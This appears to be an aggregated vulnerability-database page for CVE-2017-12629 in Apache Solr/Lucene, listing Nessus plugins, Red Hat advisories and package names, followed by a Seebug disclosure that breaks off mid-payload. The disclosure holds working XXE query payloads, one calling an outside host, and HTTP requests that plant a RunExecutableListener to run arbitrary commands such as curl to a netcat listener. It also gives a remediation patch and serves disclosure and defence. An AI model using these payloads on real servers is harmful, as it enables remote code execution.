    modified: 2018-01-15
    plugin id: 105935
    published: 2018-01-15
    reporter: This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/105935
    title: Fedora 27 : lucene (2017-9b3e2904bf)
  • NASL family: Fedora Local Security Checks
    NASL id: FEDORA_2017-0929E71B41.NASL
    description: Security fix for CVE-2017-12629. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-05
    modified: 2017-11-29
    plugin id: 104821
    published: 2017-11-29
    reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/104821
    title: Fedora 26 : lucene4 (2017-0929e71b41)
  • NASL family: Fedora Local Security Checks
    NASL id: FEDORA_2017-F1535B86FA.NASL
    description: Security fix for CVE-2017-12629. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-05
    modified: 2017-11-29
    plugin id: 104833
    published: 2017-11-29
    reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/104833
    title: Fedora 25 : lucene4 (2017-f1535b86fa)
  • NASL family: Red Hat Local Security Checks
    NASL id: REDHAT-RHSA-2018-0005.NASL
    description: An update for eap7-jboss-ec2-eap is now available for Red Hat JBoss Enterprise Application Platform 7.0 for Red Hat Enterprise Linux 6 and Red Hat JBoss Enterprise Application Platform 7.0 for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The eap7-jboss-ec2-eap packages provide scripts for Red Hat JBoss Enterprise Application Platform running on the Amazon Web Services (AWS) Elastic Compute Cloud (EC2). With this update, the eap7-jboss-ec2-eap package has been updated to ensure compatibility with Red Hat JBoss Enterprise Application Platform 7.0.9. Refer to the JBoss Enterprise Application Platform 7.0.9 Release Notes, linked to in the References section, for information on the most significant bug fixes and enhancements included in this release. Security Fix(es): * It was found that Apache Lucene would accept an object from an unauthenticated user that could be manipulated through subsequent post requests. An attacker could use this flaw to assemble an object that could permit execution of arbitrary code if the server enabled Apache Solr
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 105522
    published: 2018-01-04
    reporter: This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/105522
    title: RHEL 6 / 7 : eap7-jboss-ec2-eap (RHSA-2018:0005)
  • NASL family: Debian Local Security Checks
    NASL id: DEBIAN_DLA-1254.NASL
    description: Michael Stepankin and Olga Barinova discovered a remote code execution vulnerability in Apache Solr by exploiting XML External Entity processing (XXE) in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. To resolve this issue the RunExecutableListener class has been removed and resolving of external entities in the CoreParser class disallowed. For Debian 7
    last seen: 2020-03-17
    modified: 2018-01-22
    plugin id: 106210
    published: 2018-01-22
    reporter: This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/106210
    title: Debian DLA-1254-1 : lucene-solr security update
  • NASL family: Fedora Local Security Checks
    NASL id: FEDORA_2017-195E7EA9A8.NASL
    description: Security fix for CVE-2017-12629. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-05
    modified: 2018-01-15
    plugin id: 105826
    published: 2018-01-15
    reporter: This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/105826
    title: Fedora 27 : lucene4 (2017-195e7ea9a8)
  • NASL family: Red Hat Local Security Checks
    NASL id: REDHAT-RHSA-2018-0002.NASL
    description: An update is now available for Red Hat JBoss Enterprise Application Platform 7.0 for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server. This release of Red Hat JBoss Enterprise Application Platform 7.0.9 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.0.8, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Security Fix(es): * It was found that Apache Lucene would accept an object from an unauthenticated user that could be manipulated through subsequent post requests. An attacker could use this flaw to assemble an object that could permit execution of arbitrary code if the server enabled Apache Solr
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 105559
    published: 2018-01-04
    reporter: This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/105559
    title: RHEL 6 : JBoss EAP (RHSA-2018:0002)
  • NASL family: Ubuntu Local Security Checks
    NASL id: UBUNTU_USN-4259-1.NASL
    description: Michael Stepankin and Olga Barinova discovered that Apache Solr was vulnerable to an XXE attack. An attacker could use this vulnerability to remotely execute code. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 133355
    published: 2020-01-30
    reporter: Ubuntu Security Notice (C) 2020 Canonical, Inc. / NASL script (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/133355
    title: Ubuntu 16.04 LTS : Apache Solr vulnerability (USN-4259-1)

Packetstorm

data source: https://packetstormsecurity.com/files/download/144678/apachesolr701-xxe.txt
id: PACKETSTORM:144678
last seen: 2017-10-21
published: 2017-10-18
reporter: Michael Stepankin
source: https://packetstormsecurity.com/files/144678/Apache-Solr-7.0.1-XXE-Injection-Code-Execution.html
title: Apache Solr 7.0.1 XXE Injection / Code Execution

Redhat

advisories
  • rhsa
    id: RHSA-2017:3123
  • rhsa
    id: RHSA-2017:3124
  • rhsa
    id: RHSA-2017:3244
  • rhsa
    id: RHSA-2017:3451
  • rhsa
    id: RHSA-2017:3452
  • rhsa
    id: RHSA-2018:0002
  • rhsa
    id: RHSA-2018:0003
  • rhsa
    id: RHSA-2018:0004
  • rhsa
    id: RHSA-2018:0005
rpms
  • eap7-lucene-analyzers-common-0:5.3.1-4.redhat_2.1.ep7.el6
  • eap7-lucene-analyzers-common-0:5.3.1-4.redhat_2.1.ep7.el7
  • eap7-lucene-backward-codecs-0:5.3.1-4.redhat_2.1.ep7.el6
  • eap7-lucene-backward-codecs-0:5.3.1-4.redhat_2.1.ep7.el7
  • eap7-lucene-core-0:5.3.1-4.redhat_2.1.ep7.el6
  • eap7-lucene-core-0:5.3.1-4.redhat_2.1.ep7.el7
  • eap7-lucene-facet-0:5.3.1-4.redhat_2.1.ep7.el6
  • eap7-lucene-facet-0:5.3.1-4.redhat_2.1.ep7.el7
  • eap7-lucene-misc-0:5.3.1-4.redhat_2.1.ep7.el6
  • eap7-lucene-misc-0:5.3.1-4.redhat_2.1.ep7.el7
  • eap7-lucene-queries-0:5.3.1-4.redhat_2.1.ep7.el6
  • eap7-lucene-queries-0:5.3.1-4.redhat_2.1.ep7.el7
  • eap7-lucene-queryparser-0:5.3.1-4.redhat_2.1.ep7.el6
  • eap7-lucene-queryparser-0:5.3.1-4.redhat_2.1.ep7.el7
  • eap7-lucene-solr-0:5.3.1-4.redhat_2.1.ep7.el6
  • eap7-lucene-solr-0:5.3.1-4.redhat_2.1.ep7.el7
  • rh-java-common-lucene-0:4.8.0-6.9.el6
  • rh-java-common-lucene-0:4.8.0-6.9.el7
  • rh-java-common-lucene-analysis-0:4.8.0-6.9.el6
  • rh-java-common-lucene-analysis-0:4.8.0-6.9.el7
  • rh-java-common-lucene-analyzers-phonetic-0:4.8.0-6.9.el6
  • rh-java-common-lucene-analyzers-phonetic-0:4.8.0-6.9.el7
  • rh-java-common-lucene-analyzers-smartcn-0:4.8.0-6.9.el6
  • rh-java-common-lucene-analyzers-smartcn-0:4.8.0-6.9.el7
  • rh-java-common-lucene-analyzers-stempel-0:4.8.0-6.9.el6
  • rh-java-common-lucene-analyzers-stempel-0:4.8.0-6.9.el7
  • rh-java-common-lucene-classification-0:4.8.0-6.9.el6
  • rh-java-common-lucene-classification-0:4.8.0-6.9.el7
  • rh-java-common-lucene-codecs-0:4.8.0-6.9.el6
  • rh-java-common-lucene-codecs-0:4.8.0-6.9.el7
  • rh-java-common-lucene-facet-0:4.8.0-6.9.el6
  • rh-java-common-lucene-facet-0:4.8.0-6.9.el7
  • rh-java-common-lucene-grouping-0:4.8.0-6.9.el6
  • rh-java-common-lucene-grouping-0:4.8.0-6.9.el7
  • rh-java-common-lucene-highlighter-0:4.8.0-6.9.el6
  • rh-java-common-lucene-highlighter-0:4.8.0-6.9.el7
  • rh-java-common-lucene-javadoc-0:4.8.0-6.9.el6
  • rh-java-common-lucene-javadoc-0:4.8.0-6.9.el7
  • rh-java-common-lucene-join-0:4.8.0-6.9.el6
  • rh-java-common-lucene-join-0:4.8.0-6.9.el7
  • rh-java-common-lucene-memory-0:4.8.0-6.9.el6
  • rh-java-common-lucene-memory-0:4.8.0-6.9.el7
  • rh-java-common-lucene-misc-0:4.8.0-6.9.el6
  • rh-java-common-lucene-misc-0:4.8.0-6.9.el7
  • rh-java-common-lucene-parent-0:4.8.0-6.9.el6
  • rh-java-common-lucene-parent-0:4.8.0-6.9.el7
  • rh-java-common-lucene-queries-0:4.8.0-6.9.el6
  • rh-java-common-lucene-queries-0:4.8.0-6.9.el7
  • rh-java-common-lucene-queryparser-0:4.8.0-6.9.el6
  • rh-java-common-lucene-queryparser-0:4.8.0-6.9.el7
  • rh-java-common-lucene-replicator-0:4.8.0-6.9.el6
  • rh-java-common-lucene-replicator-0:4.8.0-6.9.el7
  • rh-java-common-lucene-sandbox-0:4.8.0-6.9.el6
  • rh-java-common-lucene-sandbox-0:4.8.0-6.9.el7
  • rh-java-common-lucene-solr-grandparent-0:4.8.0-6.9.el6
  • rh-java-common-lucene-solr-grandparent-0:4.8.0-6.9.el7
  • rh-java-common-lucene-suggest-0:4.8.0-6.9.el6
  • rh-java-common-lucene-suggest-0:4.8.0-6.9.el7
  • rh-java-common-lucene5-0:5.4.1-2.4.el6
  • rh-java-common-lucene5-0:5.4.1-2.4.el7
  • rh-java-common-lucene5-analysis-0:5.4.1-2.4.el6
  • rh-java-common-lucene5-analysis-0:5.4.1-2.4.el7
  • rh-java-common-lucene5-analyzers-smartcn-0:5.4.1-2.4.el6
  • rh-java-common-lucene5-analyzers-smartcn-0:5.4.1-2.4.el7
  • rh-java-common-lucene5-backward-codecs-0:5.4.1-2.4.el6
  • rh-java-common-lucene5-backward-codecs-0:5.4.1-2.4.el7
  • rh-java-common-lucene5-classification-0:5.4.1-2.4.el6
  • rh-java-common-lucene5-classification-0:5.4.1-2.4.el7
  • rh-java-common-lucene5-codecs-0:5.4.1-2.4.el6
  • rh-java-common-lucene5-codecs-0:5.4.1-2.4.el7
  • rh-java-common-lucene5-facet-0:5.4.1-2.4.el6
  • rh-java-common-lucene5-facet-0:5.4.1-2.4.el7
  • rh-java-common-lucene5-grouping-0:5.4.1-2.4.el6
  • rh-java-common-lucene5-grouping-0:5.4.1-2.4.el7
  • rh-java-common-lucene5-highlighter-0:5.4.1-2.4.el6
  • rh-java-common-lucene5-highlighter-0:5.4.1-2.4.el7
  • rh-java-common-lucene5-javadoc-0:5.4.1-2.4.el6
  • rh-java-common-lucene5-javadoc-0:5.4.1-2.4.el7
  • rh-java-common-lucene5-join-0:5.4.1-2.4.el6
  • rh-java-common-lucene5-join-0:5.4.1-2.4.el7
  • rh-java-common-lucene5-memory-0:5.4.1-2.4.el6
  • rh-java-common-lucene5-memory-0:5.4.1-2.4.el7
  • rh-java-common-lucene5-misc-0:5.4.1-2.4.el6
  • rh-java-common-lucene5-misc-0:5.4.1-2.4.el7
  • rh-java-common-lucene5-parent-0:5.4.1-2.4.el6
  • rh-java-common-lucene5-parent-0:5.4.1-2.4.el7
  • rh-java-common-lucene5-queries-0:5.4.1-2.4.el6
  • rh-java-common-lucene5-queries-0:5.4.1-2.4.el7
  • rh-java-common-lucene5-queryparser-0:5.4.1-2.4.el6
  • rh-java-common-lucene5-queryparser-0:5.4.1-2.4.el7
  • rh-java-common-lucene5-replicator-0:5.4.1-2.4.el6
  • rh-java-common-lucene5-replicator-0:5.4.1-2.4.el7
  • rh-java-common-lucene5-sandbox-0:5.4.1-2.4.el6
  • rh-java-common-lucene5-sandbox-0:5.4.1-2.4.el7
  • rh-java-common-lucene5-solr-grandparent-0:5.4.1-2.4.el6
  • rh-java-common-lucene5-solr-grandparent-0:5.4.1-2.4.el7
  • rh-java-common-lucene5-suggest-0:5.4.1-2.4.el6
  • rh-java-common-lucene5-suggest-0:5.4.1-2.4.el7
  • eap7-activemq-artemis-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
  • eap7-activemq-artemis-cli-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
  • eap7-activemq-artemis-commons-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
  • eap7-activemq-artemis-core-client-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
  • eap7-activemq-artemis-dto-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
  • eap7-activemq-artemis-hornetq-protocol-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
  • eap7-activemq-artemis-hqclient-protocol-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
  • eap7-activemq-artemis-jms-client-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
  • eap7-activemq-artemis-jms-server-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
  • eap7-activemq-artemis-journal-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
  • eap7-activemq-artemis-native-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
  • eap7-activemq-artemis-ra-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
  • eap7-activemq-artemis-selector-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
  • eap7-activemq-artemis-server-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
  • eap7-activemq-artemis-service-extensions-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
  • eap7-hibernate-0:5.0.16-1.Final_redhat_1.1.ep7.el6
  • eap7-hibernate-core-0:5.0.16-1.Final_redhat_1.1.ep7.el6
  • eap7-hibernate-entitymanager-0:5.0.16-1.Final_redhat_1.1.ep7.el6
  • eap7-hibernate-envers-0:5.0.16-1.Final_redhat_1.1.ep7.el6
  • eap7-hibernate-infinispan-0:5.0.16-1.Final_redhat_1.1.ep7.el6
  • eap7-hibernate-java8-0:5.0.16-1.Final_redhat_1.1.ep7.el6
  • eap7-ironjacamar-0:1.3.8-1.Final_redhat_1.1.ep7.el6
  • eap7-ironjacamar-common-api-0:1.3.8-1.Final_redhat_1.1.ep7.el6
  • eap7-ironjacamar-common-impl-0:1.3.8-1.Final_redhat_1.1.ep7.el6
  • eap7-ironjacamar-common-spi-0:1.3.8-1.Final_redhat_1.1.ep7.el6
  • eap7-ironjacamar-core-api-0:1.3.8-1.Final_redhat_1.1.ep7.el6
  • eap7-ironjacamar-core-impl-0:1.3.8-1.Final_redhat_1.1.ep7.el6
  • eap7-ironjacamar-deployers-common-0:1.3.8-1.Final_redhat_1.1.ep7.el6
  • eap7-ironjacamar-jdbc-0:1.3.8-1.Final_redhat_1.1.ep7.el6
  • eap7-ironjacamar-validator-0:1.3.8-1.Final_redhat_1.1.ep7.el6
  • eap7-jboss-remoting-0:4.0.25-1.Final_redhat_1.1.ep7.el6
  • eap7-jboss-xnio-base-0:3.4.7-1.Final_redhat_1.1.ep7.el6
  • eap7-jgroups-0:3.6.12-1.Final_redhat_1.1.ep7.el6
  • eap7-resteasy-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
  • eap7-resteasy-async-http-servlet-3.0-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
  • eap7-resteasy-atom-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
  • eap7-resteasy-cdi-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
  • eap7-resteasy-client-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
  • eap7-resteasy-crypto-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
  • eap7-resteasy-jackson-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
  • eap7-resteasy-jackson2-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
  • eap7-resteasy-jaxb-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
  • eap7-resteasy-jaxrs-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
  • eap7-resteasy-jettison-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
  • eap7-resteasy-jose-jwt-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
  • eap7-resteasy-jsapi-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
  • eap7-resteasy-json-p-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
  • eap7-resteasy-multipart-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
  • eap7-resteasy-spring-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
  • eap7-resteasy-validator-provider-11-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
  • eap7-resteasy-yaml-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
  • eap7-undertow-0:1.3.31-3.Final_redhat_3.1.ep7.el6
  • eap7-wildfly-0:7.0.9-4.GA_redhat_3.1.ep7.el6
  • eap7-wildfly-javadocs-0:7.0.9-2.GA_redhat_3.1.ep7.el6
  • eap7-wildfly-modules-0:7.0.9-4.GA_redhat_3.1.ep7.el6
  • eap7-activemq-artemis-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
  • eap7-activemq-artemis-cli-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
  • eap7-activemq-artemis-commons-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
  • eap7-activemq-artemis-core-client-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
  • eap7-activemq-artemis-dto-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
  • eap7-activemq-artemis-hornetq-protocol-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
  • eap7-activemq-artemis-hqclient-protocol-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
  • eap7-activemq-artemis-jms-client-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
  • eap7-activemq-artemis-jms-server-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
  • eap7-activemq-artemis-journal-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
  • eap7-activemq-artemis-native-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
  • eap7-activemq-artemis-ra-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
  • eap7-activemq-artemis-selector-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
  • eap7-activemq-artemis-server-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
  • eap7-activemq-artemis-service-extensions-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
  • eap7-hibernate-0:5.0.16-1.Final_redhat_1.1.ep7.el7
  • eap7-hibernate-core-0:5.0.16-1.Final_redhat_1.1.ep7.el7
  • eap7-hibernate-entitymanager-0:5.0.16-1.Final_redhat_1.1.ep7.el7
  • eap7-hibernate-envers-0:5.0.16-1.Final_redhat_1.1.ep7.el7
  • eap7-hibernate-infinispan-0:5.0.16-1.Final_redhat_1.1.ep7.el7
  • eap7-hibernate-java8-0:5.0.16-1.Final_redhat_1.1.ep7.el7
  • eap7-ironjacamar-0:1.3.8-1.Final_redhat_1.1.ep7.el7
  • eap7-ironjacamar-common-api-0:1.3.8-1.Final_redhat_1.1.ep7.el7
  • eap7-ironjacamar-common-impl-0:1.3.8-1.Final_redhat_1.1.ep7.el7
  • eap7-ironjacamar-common-spi-0:1.3.8-1.Final_redhat_1.1.ep7.el7
  • eap7-ironjacamar-core-api-0:1.3.8-1.Final_redhat_1.1.ep7.el7
  • eap7-ironjacamar-core-impl-0:1.3.8-1.Final_redhat_1.1.ep7.el7
  • eap7-ironjacamar-deployers-common-0:1.3.8-1.Final_redhat_1.1.ep7.el7
  • eap7-ironjacamar-jdbc-0:1.3.8-1.Final_redhat_1.1.ep7.el7
  • eap7-ironjacamar-validator-0:1.3.8-1.Final_redhat_1.1.ep7.el7
  • eap7-jboss-remoting-0:4.0.25-1.Final_redhat_1.1.ep7.el7
  • eap7-jboss-xnio-base-0:3.4.7-1.Final_redhat_1.1.ep7.el7
  • eap7-jgroups-0:3.6.12-1.Final_redhat_1.1.ep7.el7
  • eap7-resteasy-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
  • eap7-resteasy-async-http-servlet-3.0-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
  • eap7-resteasy-atom-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
  • eap7-resteasy-cdi-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
  • eap7-resteasy-client-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
  • eap7-resteasy-crypto-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
  • eap7-resteasy-jackson-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
  • eap7-resteasy-jackson2-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
  • eap7-resteasy-jaxb-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
  • eap7-resteasy-jaxrs-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
  • eap7-resteasy-jettison-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
  • eap7-resteasy-jose-jwt-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
  • eap7-resteasy-jsapi-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
  • eap7-resteasy-json-p-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
  • eap7-resteasy-multipart-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
  • eap7-resteasy-spring-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
  • eap7-resteasy-validator-provider-11-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
  • eap7-resteasy-yaml-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
  • eap7-undertow-0:1.3.31-3.Final_redhat_3.1.ep7.el7
  • eap7-wildfly-0:7.0.9-4.GA_redhat_3.1.ep7.el7
  • eap7-wildfly-javadocs-0:7.0.9-2.GA_redhat_3.1.ep7.el7
  • eap7-wildfly-modules-0:7.0.9-4.GA_redhat_3.1.ep7.el7
  • eap7-jboss-ec2-eap-0:7.0.9-2.GA_redhat_2.ep7.el6
  • eap7-jboss-ec2-eap-0:7.0.9-2.GA_redhat_2.ep7.el7
  • eap7-jboss-ec2-eap-samples-0:7.0.9-2.GA_redhat_2.ep7.el6
  • eap7-jboss-ec2-eap-samples-0:7.0.9-2.GA_redhat_2.ep7.el7

Seebug

bulletinFamily: exploit
description:

### First Vulnerability: XML External Entity Expansion (deftype=xmlparser)

Lucene includes a query parser that is able to create the full spectrum of Lucene queries, using an XML data structure. Starting from version 5.1 Solr supports the "xml" query parser in the search query. The problem is that the Lucene XML parser does not explicitly prohibit doctype declaration and expansion of external entities. It is possible to include special entities in the XML document that point to external files (via file://) or external URLs (via http://):

```
Example usage:
http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://xxx.s.artsploit.com/xxx"'><a></a>'}
```

When Solr is parsing this request, it makes an HTTP request to http://xxx.s.artsploit.com/xxx and treats its content as the DOCTYPE definition. Considering that we can define the parser type in the search query, which very often comes from untrusted user input (e.g. search fields on websites), this allows an external attacker to make arbitrary HTTP requests to the local Solr instance and to bypass all firewall restrictions. For example, this vulnerability could be used to send malicious data to the '/upload' handler:

```
http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://xxx.s.artsploit.com/solr/gettingstarted/upload?stream.body={"xx":"yy"}&commit=true"'><a></a>'}
```

This vulnerability can also be exploited as Blind XXE using the ftp wrapper in order to read arbitrary local files from the Solr server.

Vulnerable code location: `/solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java`

```java
static Document parseXML(InputStream pXmlFile) throws ParserException {
  DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
  DocumentBuilder db = null;
  try {
    db = dbf.newDocumentBuilder();
  } catch (Exception se) {
    throw new ParserException("XML Parser configuration error", se);
  }
  org.w3c.dom.Document doc = null;
  try {
    doc = db.parse(pXmlFile);
  }
```

#### Steps to reproduce:

1. Set up a listener on any port by using the netcat command "`nc -lv 4444`"
2. Open `http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:4444/executed"><a></a>'}`
3. You will see a request from the Solr server on your netcat listener. It proves that the DOCTYPE declaration is resolved.

#### Remediation suggestions:

Consider adding the following lines to `/solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java`:

```java
static Document parseXML(InputStream pXmlFile) throws ParserException {
  DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
  DocumentBuilder db = null;
  try {
    // protect from XXE attacks
    dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
    dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    db = dbf.newDocumentBuilder();
  } catch (Exception se) {
    throw new ParserException("XML Parser configuration error", se);
  }
  org.w3c.dom.Document doc = null;
  try {
    doc = db.parse(pXmlFile);
  }
```

#### Links:

https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet

#### CVSS v2 base score: 9.0 (AV:N/AC:L/Au:N/C:C/I:P/A:P)

### Second Vulnerability: Remote Code Execution (add-listener: RunExecutableListener)

Solr's "RunExecutableListener" class can be used to execute arbitrary commands on specific events, for example after each update query. The problem is that such a listener can be enabled with any parameters just by using the Config API with the add-listener command.

```
POST /solr/newcollection/config HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json
Content-Length: 198

{
  "add-listener" : {
    "event":"postCommit",
    "name":"newlistener",
    "class":"solr.RunExecutableListener",
    "exe":"ANYCOMMAND",
    "dir":"/usr/bin/",
    "args":["ANYARGS"]
  }
}
```

Parameters "exe", "args" and "dir" can be crafted through the HTTP request during modification of the collection's config. This means that anybody who can send an HTTP request to the Solr API is able to execute arbitrary shell commands when the "postCommit" event is fired. It leads to execution of arbitrary remote code for a remote attacker.

#### Steps to reproduce:

Step 1. Create a new collection: http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2

Step 2. Set up a listener on any port by using the netcat command "nc -lv 4444"

Step 3. Add a new RunExecutableListener listener for the collection, where the "exe" attribute contains the name of the command to run ("/usr/bin/curl") and the "args" attribute contains the value "http://localhost:4444/executed", to make a request to the attacker's netcat listener:

```
POST /solr/newcollection/config HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json
Content-Length: 198

{
  "add-listener" : {
    "event":"postCommit",
    "name":"newlistener",
    "class":"solr.RunExecutableListener",
    "exe":"curl",
    "dir":"/usr/bin/",
    "args":["http://localhost:4444/executed"]
  }
}
```

Step 4. Update "newcollection" to trigger execution of RunExecutableListener:

```
POST /solr/newcollection/update HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json
Content-Length: 19

[{"id":"test"}]
```

Step 5. You will see a request from the Solr server on your netcat listener. It proves that the curl command is executed on the server.

#### CVSS v2 base score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)

### Summary:

By chaining these two vulnerabilities, an external attacker can achieve remote code execution even without direct access to the Solr server. The only requirement is that the attacker should be able to specify a part of the query that goes into the "q" search parameter (which is the case for many web applications that use Solr). Let's say that we have an attacker who can only send search queries ("q" param) to a "/select" Solr endpoint. Here is the complete exploit scenario:

Step 1. Create a new collection via XXE. This step may be skipped if the attacker already knows any collection name.

```
http://localhost:8983/solr/gettingstarted/select?q=%20%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%61%64%6d%69%6e%2f%63%6f%6c%6c%65%63%74%69%6f%6e%73%3f%61%63%74%69%6f%6e%3d%43%52%45%41%54%45%26%6e%61%6d%65%3d%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%26%6e%75%6d%53%68%61%72%64%73%3d%32%22%3e%3c%61%3e%3c%2f%61%3e%27%7d%20
```

Without URL encode:

```
http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2"><a></a>'}
```

Step 2. Set up a netcat listener "nc -lv 4444"

Step 3.
Add a new RunExecutableListener listener via XXE. (The URL-encoded form of this request, originally listed here, is omitted; it is the percent-encoding of the request below.)

Without URL encode:

```
http://localhost:8983/solr/newcollection/select?q={!xmlparser v='<!DOCTYPE a SYSTEM
